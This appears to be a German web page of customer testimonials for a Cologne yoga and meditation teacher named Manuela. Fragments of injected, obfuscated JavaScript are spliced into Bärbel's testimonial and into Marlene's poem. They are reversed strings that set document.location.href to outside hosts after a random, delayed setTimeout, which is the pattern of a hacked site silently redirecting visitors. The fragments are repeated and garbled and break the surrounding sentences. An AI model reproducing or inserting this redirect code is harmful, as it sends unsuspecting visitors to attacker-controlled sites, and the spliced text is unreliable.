Und hier einige schriftliche Feedbacks von Kursteilnehmern: 

Hallo liebe Manuela ,

ich möchte dir ein Feedback zu deinem Yoga geben. Ich habe nun 10 mal bei dir im Unterricht sein dürfen und ich kann nicht glauben was sich alles verändert hat. Ich bin viel beweglicher geworden, mit meiner COPD Erkrankung ist für mich kaum Sport möglich UND mit deinen tollen Übungen fällt mir auch das Armen leichter🙏 ich bin so glücklich dass ich den Weg zu dir gefunden habe. Deine wertschätzende und einfühlsame Art machen es mir sehr leicht, mich auf alle Übungen einzulassen, was mir besonders gut gefällt ist, dass es nicht so furchtbar ernst zugeht denn lachen ist bekanntlich die beste Medizin . Als Yogalehrerin und Mensch bekommst du von mir 10 von 10 möglichen Punkten . Ich freue mich die Reise zu Mir und zu meinem Wohlbefinden mit dir gemeinsam zu beschreiten🧘‍♂️Namaste🙏

Ilona K., Köln, 53 Jahre, 24.05.2023

 

Yoga, Meditation und Entspannung in einem duftenden Raum unter der Leitung einer liebevollen Begleiterin. Danke Manuela, es ist immer wieder ein Erlebnis bei dir!!!

Barbara, Köln, 58 Jahre,  09.07.2022

 

Liebe Manuela,
ich sitze jetzt zuhause und lass die wundervolle Begleitung der Meditation im Rahmen der Trauerbewältigung und die CQM Behandlung nochmals wirken. In der Meditation konnte ich einen großen Teil meiner Trauer loslassen. Deine Herzlichkeit und Dein Einfühlungsvermögen sind für mich ein unglaubliches Geschenk. Du gibst mir soviel Herzenswärme, dass es mich schon fast beschämt, die wunderbaren Zuwendungen anzunehmen. Du bist für mich ein Engel auf Erden. Danke, dass ich Dich kennenlernen durfte und danke nochmal für diesen heilsamen Abend. Alles Liebe.

Christa aus Köln, 61 Jahre, 30.07.2021

 

Hallo liebe Manuela, ich wollte Dir die ganze Zeit schon gesagt haben, dass mir letzten Montag Yoga sehr gut gefallen und gut getan hat. Danke.
Sonnige Grüße

Katreen aus Köln-Dünnwald, 10.07.2021

 

Hallo meine Liebe! Ich versuche kurz in Worten zu fassen, wie wertvoll und bereichernd dein Yogaunterricht für mich ist. Ich bin stets beeindruckt von deinem großen Herzen und deiner positiven Energie und die Stimme. Die neue Herausforderungen. Einfach wundervoll !!!!!!!!!!! 
Vielen lieben Dank 😍🥰😘 und Muskelkater habe ich auch 🙈 

Sonia aus Köln, 19.08.2020 

 

Liebe Manuela, das war heute eine sehr angenehme und bereichernde Yoga Stunde. Du bist großartig und das gilt auch für die Gruppe. Danke, es hat gut getan 🧘‍♀️🧘‍♀️🧘‍♀️🧘‍♀️🧘‍♀️auch wenn die Knochen knirschen 🙋‍♀️

Astrid aus Köln, 68 Jahre, 28.07.2020

 

„Manuela ist eine ausgesprochen angenehme, freundliche Yogalehrerin, die mit viel Herz und Engagement unterrichtet. 
Sie kennt genau die individuellen Stärken und Schwächen ihrer SchülerInnen und achtet sehr sorgfältig auf deren Bedürfnisse. Manuelas Unterricht ist professionell und authentisch und sie versteht es der Stunde ihre ganz persönliche Note zu verleihen.“

Stefanie aus Schildgen, 26.02.2020

 

Bei Manuela fühlt man sich durch ihre herzliche Art und toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Atmosphäre sofort wohl. Sie hat viel Verständnis, wenn es mal bei einem nicht so läuft. Weiß aber auch genau,  wie Sie aus einem noch mehr rausholt.
Kurz gesagt, es macht einfach bei/mit ihr Spaß

Bärbel, 52 J., Köln Höhenhaus, 02/20

 

"18.00 Uhr an jedem Dienstag
ist Yoga für uns alle angesagt.
In Manuelas schönem Yogaraum
üben wir Sonnengruß und auch den Baum. 
Kamelritt, Katze oder Kuh
gehören beim Yoga auch dazu.
Die Kerze fällt noch einigen schwer,
toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doch kommen wir gerne her. 
Ob Kundalini oder Hatha
Yoga ist für alle da. 
Und Manuela mit ihrer sanften Stimme
entführt uns fast bis in den Himmel."

Marlene, Köln, 75 Jahre, 01/2020

 

"Nicht nur die herzliche Begrüßung, sondern auch die Räumlichkeiten lassen einen spüren, wieviel Herzblut dahinter steckt.  Wenn auch manche Übungen etwas schwer fallen, so fühle ich mich als Anfängerin bei Manuela und in der Gruppe sehr aufgehoben. Immer wieder wohltuend für Körper, Geist und Seele. Danke für das gute Gefühl."

Monika B. aus Köln, 58 Jahre, 01/2020

 

"Manuela hat eine wundervoll kölsche Herangehensweise an Kundalini Yoga und nimmt uns mit Ihrer herzlichen und aufmerksamen Art jedes Mal auf eine neue, spannende Reise mit."

Nampriya Ravi Kaur, Köln 37 Jahre, 01/2020

 

In einem wunderschönen, mit Licht und Kerzen liebevoll eingerichteter Raum geht die Zeit manchmal viel zu schnell vorbei. Mir tut der Zusammenklang von Bewegung für Rücken und Entspannung sehr gut. Außerdem erfahre ich bei den Übungen viel über die positive Wirkung von Körper, Geist und Seele. 
Weiter so!!!!

Irmgard M., Köln-Dünnwald,  55 Jahre, Yoga 50+ , 12/2019

 

Ich habe bei Manuela eine Schnupperstunde Yoga auf dem Stuhl genossen. Die Räumlichkeiten und der strukturierte Unterricht mit Übungen rund um den Stuhl, die Entspannungsübungen und Meditation haben mir gut gefallen. Leider passt der Kurstag nicht mit meiner Arbeitzeit überein, so dass ich hierauf verzichten muss. Schade. 

Barbara Z., 68 Jahre, aus Bergisch Gladbach, Yoga 50 + , 10/2019